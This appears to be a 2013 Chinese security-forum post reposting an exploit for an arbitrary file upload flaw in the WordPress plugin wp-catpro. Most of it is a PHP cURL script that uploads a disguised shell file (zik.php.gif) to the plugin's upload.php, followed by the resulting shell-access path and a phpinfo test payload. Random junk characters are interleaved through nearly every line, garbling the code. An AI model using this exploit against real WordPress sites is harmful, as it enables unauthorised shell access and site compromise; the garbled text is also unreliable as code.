中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% p2 l5 ]# ^9 |, w- j7 {#-----------------------------------------------------------------------9 _; @/ L' A. F2 f) _
8 E9 I8 q+ `4 w: }& U8 \5 U
作者  => Zikou-16
8 h2 i& h: w, B* f邮箱 => zikou16x@gmail.com/ f/ x7 |) W; q9 O  B
测试系统 : Windows 7 , Backtrack 5r3
0 Z2 u( H2 v& l- l下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
, [1 \8 K3 \0 L. y" I/ t####
& P+ G+ P) p5 q5 E
8 H7 p/ C/ n/ N" ~% K6 c  J+ P#=> Exploit 信息:$ D% s. E* a0 K
------------------
% L+ T3 x+ F0 S% }7 q% C7 l8 P; B# 攻击者可以上传 file/shell.php.gif' C) w' ]9 b# E7 {( }& |
# ("jpg", "gif", "png")  // Allowed file extensions' {& ^: T9 ~6 x! D, q9 F1 n
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
/ F3 G8 [( b0 S; V4 Q1 e5 Y& x8 ^# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
' D# I1 p9 _9 g( z. L------------------* E; G' `  c# Q- c2 I
, y  f" u4 @  `' {
#=> Exploit
) R% c  U$ b. p/ u1 j-----------
5 [; K. e$ c6 Y! W7 C1 D% A: M<?php4 Z$ Y) ]" v- w' M9 j! K& e
; o! W% E! N: r6 J7 G
$uploadfile="zik.php.gif";6 q$ M, @2 R, @& Y
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
7 _2 E8 d' b" j5 _( s& tcurl_setopt($ch, CURLOPT_POST, true);- A: W# R. i( S' }1 b
curl_setopt($ch, CURLOPT_POSTFIELDS,
0 m- b# V1 M3 ]# x" `; h" M5 parray('Filedata'=>"@$uploadfile",
$ [6 T$ @9 ]6 n# a'folder'=>'/wp-content/uploads/catpro/'));8 U) S$ x3 B% f- [0 C, }- X! w
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);. q+ `+ A: G; q1 n/ i7 n4 o& J
$postResult = curl_exec($ch);
* m! r: k% f+ K2 x- |curl_close($ch);
4 ^$ M! R2 R) t$ P6 D5 k
7 ~  V: ^2 a3 {9 i3 E6 yprint "$postResult";
9 ]% m2 k8 }! t: U% y. M ; U/ W# K  p  `- m- p9 ]
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
. u: k. w  e. G& y: Q) _- X  ?>
( q7 A" U6 C2 q! o<?php
* F$ f# P4 i! m9 \phpinfo();
; }" {6 i& N& e7 F. s6 Z8 _?>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2